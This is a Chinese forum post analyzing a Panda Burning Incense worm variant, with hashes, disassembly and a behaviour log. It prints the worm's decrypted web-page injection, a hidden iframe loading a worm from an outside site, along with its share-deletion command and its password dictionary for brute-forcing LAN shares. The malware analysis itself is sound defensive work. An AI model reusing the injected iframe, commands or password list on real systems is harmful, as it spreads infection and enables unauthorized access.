一个新熊猫变种,做了点变动,珊瑚QQ图标``
样本来至剑盟``
还是捆绑感染,网上分析的好多,就不写太详细了。。。。
Aditional Information
File size: 68586 bytes
CRC32 : 3392675E
RIPEMD160: 4A96E015A2D146E66B75C4A8EC00D9820193B350
Tiger_192: 21153AB25BDA43D28B411D292A09C2B9AB66BEA35CDAFA9D
MD5: 10865d0b094832d33a1cb4a4c8407ed0
SHA1: 45ca9813ba02906636cb1bad00aadc2c53482ff5
加壳方式:FSG 2.0 -> bart/xt
编写语言:Borland Delphi 6.0 - 7.0
看了反汇编,跟以前的熊猫差不多,没多大特别,做了图标资源的变动:
004191CA . 8B95 0CFBFFFF mov edx, dword ptr [ebp>
004191D0 . 8D45 EC lea eax, dword ptr [ebp>
004191D3 . B9 D0944100 mov ecx, 004194D0 \\ 这里获取图标资源````
004191D8 . E8 63B4FEFF call 00404640
004191DD . B2 01 mov dl, 1
004191DF . A1 D4444100 mov eax, dword ptr [414>
004191E4 . E8 8FD3FFFF call 00416578
004191E9 . 8945 E8 mov dword ptr [ebp-18],>
004191EC . 33C0 xor eax, eax
004191EE . 55 push ebp
004191EF . 68 4F924100 push 0041924F
004191F4 . 64:FF30 push dword ptr fs:[eax]
004191F7 . 64:8920 mov dword ptr fs:[eax],>
004191FA . 6A 00 push 0 ; /IconIndex = 0
004191FC . 53 push ebx ; |FileName
004191FD . A1 60064200 mov eax, dword ptr [420>; |
00419202 . 50 push eax ; |hInst => NULL
00419203 . E8 B0DFFEFF call 004071B8 ; \ExtractIconA
获取图标资源,复制到%temp%,熊猫烧香好像没这样做?
然后关杀软\共享,捆绑文件,穷举猜局域口令等,最后还删了.GHO
哈哈,被捆绑文件图标变模糊(是不是16位感染?),属性为隐藏,显示为FSG的壳
运行后会在同目录下生成符合扩展名,例如:Filename.exe.exe
原程序无法运行,符合扩展名的可以,并在每个目录夹下生成Desktop_.ini,为当天的感染标记。
专杀不知道能不能杀,呵呵。
SSM日志:
Parent process:
Path: C:\Documents and Settings\admin\桌面\setup.exe
PID: 596
Child process:
Path: C:\WINNT\system32\drivers\nvscv32.exe
Command line:C:\winnt\system32\drivers\nvscv32.exe
\\释放病毒文件```
Process:
Path: C:\WINNT\system32\drivers\nvscv32.exe
PID: 1660
Registry Group: User AutoRun
Object:
Registry key: HKCU\SOFTWARE\MICROSOFT\Windows\CURRENTVERSION\Run
Registry value: nvscv32
Type: REG_SZ
Value: C:\winnt\system32\drivers\nvscv32.exe
\\写注册表```
Process:
Path: C:\WINNT\system32\drivers\nvscv32.exe
PID: 1660
Network information:
IP address: 192.168.0.53
Trusted zone: No
Protocol: TCP
\\访问局域``
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 2088
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:net share D$ /del /y
\\删共享```(避免反复感染)
一些反汇编:
00401546 |. C743 04 00001>mov dword ptr [ebx+4], >
0040154D |. 6A 04 push 4 ; /Protect = PAGE_READWRITE
0040154F |. 68 00200000 push 2000 ; |AllocationType = MEM_RESERVE
00401554 |. 68 00001000 push 100000 ; |Size = 100000 (1048576.)
00401559 |. 55 push ebp ; |Address
0040155A |. E8 A5FDFFFF call <jmp.&kernel32.Virt>; \VirtualAlloc
\\比较文件大小,大10M则跳
0041AFB9 . 8B85 90FDFFFF mov eax, dword ptr [ebp>
0041AFBF . BA 68B74100 mov edx, 0041B768 ; "GHO"
0041AFC4 . E8 7797FEFF call 00404740
0041AFC9 . 75 25 jnz short 0041AFF0
0041AFCB . 8D85 88FDFFFF lea eax, dword ptr [ebp>
0041AFD1 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041AFD7 . 8B55 FC mov edx, dword ptr [ebp>
0041AFDA . E8 6196FEFF call 00404640
0041AFDF . 8B85 88FDFFFF mov eax, dword ptr [ebp>
0041AFE5 . E8 0A98FEFF call 004047F4
0041AFEA . 50 push eax ; /FileName
0041AFEB . E8 F0B1FEFF call <jmp.&kernel32.Dele>; \DeleteFileA
\\删镜像文件
0041B24F . 8D95 28FDFFFF lea edx, dword ptr [ebp>
0041B255 . B8 D0B74100 mov eax, 0041B7D0 ; ASCII "htm"
0041B25A . E8 E9B8FEFF call 00406B48
0041B25F . 8B95 28FDFFFF mov edx, dword ptr [ebp>
0041B265 . 58 pop eax
0041B266 . E8 D594FEFF call 00404740
0041B26B . 75 1F jnz short 0041B28C
0041B26D . 8D85 24FDFFFF lea eax, dword ptr [ebp>
0041B273 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B279 . 8B55 FC mov edx, dword ptr [ebp>
0041B27C . E8 BF93FEFF call 00404640
0041B281 . 8B85 24FDFFFF mov eax, dword ptr [ebp>
0041B287 . E8 1CD7FFFF call 004189A8
0041B28C > 8D95 1CFDFFFF lea edx, dword ptr [ebp>
0041B292 . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B298 . E8 D7B9FEFF call 00406C74
0041B29D . 8B85 1CFDFFFF mov eax, dword ptr [ebp>
0041B2A3 . 8D95 20FDFFFF lea edx, dword ptr [ebp>
0041B2A9 . E8 9AB8FEFF call 00406B48
0041B2AE . 8B85 20FDFFFF mov eax, dword ptr [ebp>
0041B2B4 . 50 push eax
0041B2B5 . 8D95 18FDFFFF lea edx, dword ptr [ebp>
0041B2BB . B8 DCB74100 mov eax, 0041B7DC ; ASCII "html"
0041B2C0 . E8 83B8FEFF call 00406B48
0041B2C5 . 8B95 18FDFFFF mov edx, dword ptr [ebp>
0041B2CB . 58 pop eax
0041B2CC . E8 6F94FEFF call 00404740
0041B2D1 . 75 1F jnz short 0041B2F2
0041B2D3 . 8D85 14FDFFFF lea eax, dword ptr [ebp>
0041B2D9 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B2DF . 8B55 FC mov edx, dword ptr [ebp>
0041B2E2 . E8 5993FEFF call 00404640
0041B2E7 . 8B85 14FDFFFF mov eax, dword ptr [ebp>
0041B2ED . E8 B6D6FFFF call 004189A8
0041B2F2 > 8D95 0CFDFFFF lea edx, dword ptr [ebp>
0041B2F8 . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B2FE . E8 71B9FEFF call 00406C74
0041B303 . 8B85 0CFDFFFF mov eax, dword ptr [ebp>
0041B309 . 8D95 10FDFFFF lea edx, dword ptr [ebp>
0041B30F . E8 34B8FEFF call 00406B48
0041B314 . 8B85 10FDFFFF mov eax, dword ptr [ebp>
0041B31A . 50 push eax
0041B31B . 8D95 08FDFFFF lea edx, dword ptr [ebp>
0041B321 . B8 ECB74100 mov eax, 0041B7EC ; ASCII "asp"
0041B326 . E8 1DB8FEFF call 00406B48
0041B32B . 8B95 08FDFFFF mov edx, dword ptr [ebp>
0041B331 . 58 pop eax
0041B332 . E8 0994FEFF call 00404740
0041B337 . 75 1F jnz short 0041B358
0041B339 . 8D85 04FDFFFF lea eax, dword ptr [ebp>
0041B33F . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B345 . 8B55 FC mov edx, dword ptr [ebp>
0041B348 . E8 F392FEFF call 00404640
0041B34D . 8B85 04FDFFFF mov eax, dword ptr [ebp>
0041B353 . E8 50D6FFFF call 004189A8
0041B358 > 8D95 FCFCFFFF lea edx, dword ptr [ebp>
0041B35E . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B364 . E8 0BB9FEFF call 00406C74
0041B369 . 8B85 FCFCFFFF mov eax, dword ptr [ebp>
0041B36F . 8D95 00FDFFFF lea edx, dword ptr [ebp>
0041B375 . E8 CEB7FEFF call 00406B48
0041B37A . 8B85 00FDFFFF mov eax, dword ptr [ebp>
0041B380 . 50 push eax
0041B381 . 8D95 F8FCFFFF lea edx, dword ptr [ebp>
0041B387 . B8 F8B74100 mov eax, 0041B7F8 ; ASCII "php"
0041B38C . E8 B7B7FEFF call 00406B48
0041B391 . 8B95 F8FCFFFF mov edx, dword ptr [ebp>
0041B397 . 58 pop eax
0041B398 . E8 A393FEFF call 00404740
0041B39D . 75 1F jnz short 0041B3BE
0041B39F . 8D85 F4FCFFFF lea eax, dword ptr [ebp>
0041B3A5 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B3AB . 8B55 FC mov edx, dword ptr [ebp>
0041B3AE . E8 8D92FEFF call 00404640
0041B3B3 . 8B85 F4FCFFFF mov eax, dword ptr [ebp>
0041B3B9 . E8 EAD5FFFF call 004189A8
0041B3BE > 8D95 ECFCFFFF lea edx, dword ptr [ebp>
0041B3C4 . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B3CA . E8 A5B8FEFF call 00406C74
0041B3CF . 8B85 ECFCFFFF mov eax, dword ptr [ebp>
0041B3D5 . 8D95 F0FCFFFF lea edx, dword ptr [ebp>
0041B3DB . E8 68B7FEFF call 00406B48
0041B3E0 . 8B85 F0FCFFFF mov eax, dword ptr [ebp>
0041B3E6 . 50 push eax
0041B3E7 . 8D95 E8FCFFFF lea edx, dword ptr [ebp>
0041B3ED . B8 04B84100 mov eax, 0041B804 ; ASCII "jsp"
0041B3F2 . E8 51B7FEFF call 00406B48
0041B3F7 . 8B95 E8FCFFFF mov edx, dword ptr [ebp>
0041B3FD . 58 pop eax
0041B3FE . E8 3D93FEFF call 00404740
0041B403 . 75 1F jnz short 0041B424
0041B405 . 8D85 E4FCFFFF lea eax, dword ptr [ebp>
0041B40B . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B411 . 8B55 FC mov edx, dword ptr [ebp>
0041B414 . E8 2792FEFF call 00404640
0041B419 . 8B85 E4FCFFFF mov eax, dword ptr [ebp>
0041B41F . E8 84D5FFFF call 004189A8
0041B424 > 8D95 DCFCFFFF lea edx, dword ptr [ebp>
0041B42A . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B430 . E8 3FB8FEFF call 00406C74
0041B435 . 8B85 DCFCFFFF mov eax, dword ptr [ebp>
0041B43B . 8D95 E0FCFFFF lea edx, dword ptr [ebp>
0041B441 . E8 02B7FEFF call 00406B48
0041B446 . 8B85 E0FCFFFF mov eax, dword ptr [ebp>
0041B44C . 50 push eax
0041B44D . 8D95 D8FCFFFF lea edx, dword ptr [ebp>
0041B453 . B8 10B84100 mov eax, 0041B810 ; ASCII "aspx"
0041B458 . E8 EBB6FEFF call 00406B48
0041B45D . 8B95 D8FCFFFF mov edx, dword ptr [ebp>
0041B463 . 58 pop eax
0041B464 . E8 D792FEFF call 00404740
0041B469 . 75 1F jnz short 0041B48A
0041B46B . 8D85 D4FCFFFF lea eax, dword ptr [ebp>
0041B471 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B477 . 8B55 FC mov edx, dword ptr [ebp>
0041B47A . E8 C191FEFF call 00404640
0041B47F . 8B85 D4FCFFFF mov eax, dword ptr [ebp>
\\查找网页文件,插代码
004189D8 . 8D4D F8 lea ecx, dword ptr [ebp>
004189DB . BA D08A4100 mov edx, 00418AD0 ; ASCII "Search"
004189E0 . B8 E08A4100 mov eax, 00418AE0 ; ASCII
"=nb{end'w{g>ispy>,.ps~*hsqo{*`nj+~kql)l}i#vn`}l>#7&)lfh`l}9!1%:5+jgueda="
\\插入的代码,解密得:
<iframe src=http://www.krvkr.com/worm.htm width="0" height="0"></iframe>
0041A73E > 8D85 88FEFFFF lea eax, dword ptr [ebp>
0041A744 . B9 48B54100 mov ecx, 0041B548 ; ASCII "*.*"
0041A749 . 8B55 FC mov edx, dword ptr [ebp>
0041A74C . E8 EF9EFEFF call 00404640
0041A751 . 8B85 88FEFFFF mov eax, dword ptr [ebp>
0041A757 . 8D8D 9CFEFFFF lea ecx, dword ptr [ebp>
0041A75D . BA 3F000000 mov edx, 3F
0041A762 . E8 A5DDFFFF call 0041850C
0041A767 . 85C0 test eax, eax
0041A769 . 0F85 350D0000 jnz 0041B4A4
0041A76F > 8B85 A4FEFFFF mov eax, dword ptr [ebp>
0041A775 . 83E0 10 and eax, 10
0041A778 . 83F8 10 cmp eax, 10
0041A77B . 0F85 07080000 jnz 0041AF88
0041A781 . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041A787 . 8038 2E cmp byte ptr [eax], 2E
0041A78A . 0F84 F8070000 je 0041AF88
0041A790 . 8D95 84FEFFFF lea edx, dword ptr [ebp>
0041A796 . B8 54B54100 mov eax, 0041B554 ; ASCII "WINDOWS"
0041A79B . E8 A8C3FEFF call 00406B48
0041A7A0 . 8B85 84FEFFFF mov eax, dword ptr [ebp>
0041A7A6 . 50 push eax
0041A7A7 . 8D95 80FEFFFF lea edx, dword ptr [ebp>
0041A7AD . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041A7B3 . E8 90C3FEFF call 00406B48
0041A7B8 . 8B95 80FEFFFF mov edx, dword ptr [ebp>
0041A7BE . 58 pop eax
0041A7BF . E8 7C9FFEFF call 00404740
0041A7C4 . 0F84 C70C0000 je 0041B491
0041A7CA . 8D95 7CFEFFFF lea edx, dword ptr [ebp>
........略
\\遍历分区文件,跳过NTDETECT.COM\QQ.exe\Setup.exe\nvscv32.exe和系统还原\回收站等```
0041F6C0 C0BB4100 dd setup(已.0041BBC0 ; ASCII "\Documents and Settings\All
Users\Start Menu\Programs\Startup\"
0041F6C4 08BC4100 dd setup(已.0041BC08
0041F6C8 4CBC4100 dd setup(已.0041BC4C ; ASCII "\WINDOWS\Start
Menu\Programs\Startup\"
0041F6CC 7CBC4100 dd setup(已.0041BC7C ; ASCII "\WINNT\Profiles\All
Users\Start Menu\Programs\Startup\"
0041F6D0 00 db 00
0041F6D1 00 db 00
0041F6D2 00 db 00
0041F6D3 00 db 00
0041F6D4 14C14100 dd setup(已.0041C114 ; ASCII "1234"
0041F6D8 24C14100 dd setup(已.0041C124 ; ASCII "password"
0041F6DC 38C14100 dd setup(已.0041C138 ; ASCII "6969"
0041F6E0 48C14100 dd setup(已.0041C148 ; ASCII "harley"
0041F6E4 58C14100 dd setup(已.0041C158 ; ASCII "123456"
0041F6E8 68C14100 dd setup(已.0041C168 ; ASCII "golf"
0041F6EC 78C14100 dd setup(已.0041C178 ; ASCII "pussy"
0041F6F0 88C14100 dd setup(已.0041C188 ; ASCII "mustang"
0041F6F4 98C14100 dd setup(已.0041C198 ; ASCII "1111"
0041F6F8 A8C14100 dd setup(已.0041C1A8 ; ASCII "shadow"
0041F6FC B8C14100 dd setup(已.0041C1B8 ; ASCII "1313"
0041F700 C8C14100 dd setup(已.0041C1C8 ; ASCII "fish"
0041F704 D8C14100 dd setup(已.0041C1D8 ; ASCII "5150"
0041F708 E8C14100 dd setup(已.0041C1E8 ; ASCII "7777"
0041F70C F8C14100 dd setup(已.0041C1F8 ; ASCII "qwerty"
0041F710 08C24100 dd setup(已.0041C208 ; ASCII "baseball"
0041F714 1CC24100 dd setup(已.0041C21C ; ASCII "2112"
0041F718 2CC24100 dd setup(已.0041C22C ; ASCII "letmein"
0041F71C 3CC24100 dd setup(已.0041C23C ; ASCII "12345678"
0041F720 50C24100 dd setup(已.0041C250 ; ASCII "12345"
0041F724 60C24100 dd setup(已.0041C260 ; ASCII "ccc"
0041F728 6CC24100 dd setup(已.0041C26C ; ASCII "admin"
0041F72C 7CC24100 dd setup(已.0041C27C ; ASCII "5201314"
0041F730 8CC24100 dd setup(已.0041C28C ; ASCII "qq520"
0041F734 9CC24100 dd setup(已.0041C29C
0041F738 A8C24100 dd setup(已.0041C2A8 ; ASCII "12"
0041F73C B4C24100 dd setup(已.0041C2B4 ; ASCII "123"
0041F740 C0C24100 dd setup(已.0041C2C0 ; ASCII "1234567"
0041F744 D0C24100 dd setup(已.0041C2D0 ; ASCII "123456789"
0041F748 E4C24100 dd setup(已.0041C2E4 ; ASCII "654321"
0041F74C F4C24100 dd setup(已.0041C2F4 ; ASCII "54321"
0041F750 04C34100 dd setup(已.0041C304 ; ASCII "111"
0041F754 10C34100 dd setup(已.0041C310 ; ASCII "000000"
0041F758 20C34100 dd setup(已.0041C320 ; ASCII "abc"
0041F75C 2CC34100 dd setup(已.0041C32C ; ASCII "pw"
0041F760 38C34100 dd setup(已.0041C338 ; ASCII "11111111"
0041F764 4CC34100 dd setup(已.0041C34C ; ASCII "88888888"
0041F768 60C34100 dd setup(已.0041C360 ; ASCII "pass"
0041F76C 70C34100 dd setup(已.0041C370 ; ASCII "passwd"
0041F770 80C34100 dd setup(已.0041C380 ; ASCII "database"
0041F774 94C34100 dd setup(已.0041C394 ; ASCII "abcd"
0041F778 A4C34100 dd setup(已.0041C3A4 ; ASCII "abc123"
0041F77C 60C34100 dd setup(已.0041C360 ; ASCII "pass"
0041F780 B4C34100 dd setup(已.0041C3B4 ; ASCII "sybase"
0041F784 C4C34100 dd setup(已.0041C3C4 ; ASCII "123qwe"
0041F788 D4C34100 dd setup(已.0041C3D4 ; ASCII "server"
0041F78C E4C34100 dd setup(已.0041C3E4 ; ASCII "computer"
0041F790 F8C34100 dd setup(已.0041C3F8 ; ASCII "520"
0041F794 04C44100 dd setup(已.0041C404 ; ASCII "super"
0041F798 14C44100 dd setup(已.0041C414 ; ASCII "123asd"
0041F79C 24C44100 dd setup(已.0041C424
0041F7A0 30C44100 dd setup(已.0041C430 ; ASCII "ihavenopass"
0041F7A4 44C44100 dd setup(已.0041C444 ; ASCII "godblessyou"
0041F7A8 58C44100 dd setup(已.0041C458 ; ASCII "enable"
0041F7AC 68C44100 dd setup(已.0041C468 ; ASCII "xp"
0041F7B0 74C44100 dd setup(已.0041C474 ; ASCII "2002"
0041F7B4 84C44100 dd setup(已.0041C484 ; ASCII "2003"
0041F7B8 94C44100 dd setup(已.0041C494 ; ASCII "2600"
0041F7BC A4C44100 dd setup(已.0041C4A4 ; ASCII "alpha"
0041F7C0 B4C44100 dd setup(已.0041C4B4 ; ASCII "110"
0041F7C4 C0C44100 dd setup(已.0041C4C0 ; ASCII "111111"
0041F7C8 D0C44100 dd setup(已.0041C4D0 ; ASCII "121212"
0041F7CC E0C44100 dd setup(已.0041C4E0 ; ASCII "123123"
0041F7D0 F0C44100 dd setup(已.0041C4F0 ; ASCII "1234qwer"
0041F7D4 04C54100 dd setup(已.0041C504 ; ASCII "123abc"
0041F7D8 14C54100 dd setup(已.0041C514 ; ASCII "007"
0041F7DC 20C54100 dd setup(已.0041C520
0041F7E0 2CC54100 dd setup(已.0041C52C ; ASCII "aaa"
0041F7E4 38C54100 dd setup(已.0041C538 ; ASCII "patrick"
0041F7E8 48C54100 dd setup(已.0041C548 ; ASCII "pat"
0041F7EC 54C54100 dd setup(已.0041C554 ; ASCII "administrator"
0041F7F0 6CC54100 dd setup(已.0041C56C ; ASCII "root"
0041F7F4 7CC54100 dd setup(已.0041C57C ; ASCII "sex"
0041F7F8 88C54100 dd setup(已.0041C588 ; ASCII "god"
0041F7FC 94C54100 dd setup(已.0041C594 ; ASCII "fuckyou"
0041F800 A4C54100 dd setup(已.0041C5A4 ; ASCII "fuck"
0041F804 20C34100 dd setup(已.0041C320 ; ASCII "abc"
0041F808 B4C54100 dd setup(已.0041C5B4 ; ASCII "test"
0041F80C C4C54100 dd setup(已.0041C5C4 ; ASCII "test123"
0041F810 D4C54100 dd setup(已.0041C5D4 ; ASCII "temp"
0041F814 E4C54100 dd setup(已.0041C5E4 ; ASCII "temp123"
0041F818 F4C54100 dd setup(已.0041C5F4 ; ASCII "win"
0041F81C 00C64100 dd setup(已.0041C600 ; ASCII "pc"
0041F820 0CC64100 dd setup(已.0041C60C ; ASCII "asdf"
0041F824 1CC64100 dd setup(已.0041C61C ; ASCII "pwd"
0041F828 28C64100 dd setup(已.0041C628 ; ASCII "qwer"
0041F82C 38C64100 dd setup(已.0041C638 ; ASCII "yxcv"
0041F830 48C64100 dd setup(已.0041C648 ; ASCII "zxcv"
0041F834 58C64100 dd setup(已.0041C658 ; ASCII "home"
0041F838 68C64100 dd setup(已.0041C668 ; ASCII "xxx"
0041F83C 74C64100 dd setup(已.0041C674 ; ASCII "owner"
0041F840 84C64100 dd setup(已.0041C684 ; ASCII "login"
0041F844 94C64100 dd setup(已.0041C694 ; ASCII "Login"
0041F848 A4C64100 dd setup(已.0041C6A4 ; ASCII "pw123"
0041F84C B4C64100 dd setup(已.0041C6B4 ; ASCII "love"
0041F850 C4C64100 dd setup(已.0041C6C4 ; ASCII "mypc"
0041F854 D4C64100 dd setup(已.0041C6D4 ; ASCII "mypc123"
0041F858 E4C64100 dd setup(已.0041C6E4 ; ASCII "admin123"
0041F85C F8C64100 dd setup(已.0041C6F8 ; ASCII "mypass"
0041F860 08C74100 dd setup(已.0041C708 ; ASCII "mypass123"
0041F864 1CC74100 dd setup(已.0041C71C ; ASCII "901100"
0041F868 2CC74100 dd setup(已.0041C72C ; ASCII "Administrator"
0041F86C 44C74100 dd setup(已.0041C744 ; ASCII "Guest"
0041F870 54C74100 dd setup(已.0041C754 ; ASCII "admin"
0041F874 64C74100 dd setup(已.0041C764 ; ASCII "Root"
\\获得局域共享目录,以上面的字典穷举猜口另```
还有一些删启动项\写启动项就不粘了``
一些图: